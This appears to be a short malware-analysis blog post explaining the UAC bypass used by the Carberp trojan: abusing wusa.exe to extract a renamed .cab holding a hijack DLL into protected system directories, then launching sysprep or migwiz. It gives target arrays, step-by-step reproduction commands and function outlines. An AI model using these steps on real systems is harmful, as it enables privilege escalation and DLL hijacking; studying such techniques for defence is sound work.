UAC Bypass: The Carberp Style

Wusa method used by Win32/Carberp

static const char* uacTargetDir[] = { “system32\\sysprep”, “ehome” };
static const char* uacTargetApp[] = { “sysprep.exe”, “mcx2prov.exe” };
static const char* uacTargetDll[] = { “cryptbase.dll”, “CRYPTSP.dll” };
static const char* uacTargetMsu[] = { “cryptbase.msu”, “CRYPTSP.msu” };

Steps to reproduce:
1. Make .cab archive with your own cryptbase.dll or wdscore.dll and rename it to .MSU
2. Deploy .MSU to any system directory you want with wusa.exe. For example: wusa.exe PACKAGE.MSU /quiet /extract:%WINDIR%\system32\migwiz
3. Run migwiz.exe

1. ucmWusaExtractPackage
* Purpose:
* Extract cab to protected directory using wusa.

2. ucmWusaMethod
* Purpose:
* Build and install fake msu package then run target application.

3. ucmCreateCabinetForSingleFile
* Purpose:
* Build cabinet for usage in methods where required 1 file

Leave a Reply Cancel reply

Enter your comment here...

Fill in your details below or click an icon to log in:

Email (required) (Address never made public)

Name (required)

Website

You are commenting using your WordPress.com account. ( Log Out / Change )

You are commenting using your Facebook account. ( Log Out / Change )

Cancel

Connecting to %s

%d bloggers like this:

	Peter Kruse on Let’s Learn: In-Depth on…
	mark Johnson on Malware Traffic Internals: Bla…
	Passion on Let’s Learn: In-Depth Re…
	Unknown on Programming Challenge in …
	Hung-Ting on Installing Cuckoo Sandbox on M…

	Peter Kruse on Let’s Learn: In-Depth on…
	mark Johnson on Malware Traffic Internals: Bla…
	Passion on Let’s Learn: In-Depth Re…
	Unknown on Programming Challenge in …
	Hung-Ting on Installing Cuckoo Sandbox on M…

	Peter Kruse on Let’s Learn: In-Depth on…
	mark Johnson on Malware Traffic Internals: Bla…
	Passion on Let’s Learn: In-Depth Re…
	Unknown on Programming Challenge in …
	Hung-Ting on Installing Cuckoo Sandbox on M…

Share this:

Like this:

Related

Leave a Reply Cancel reply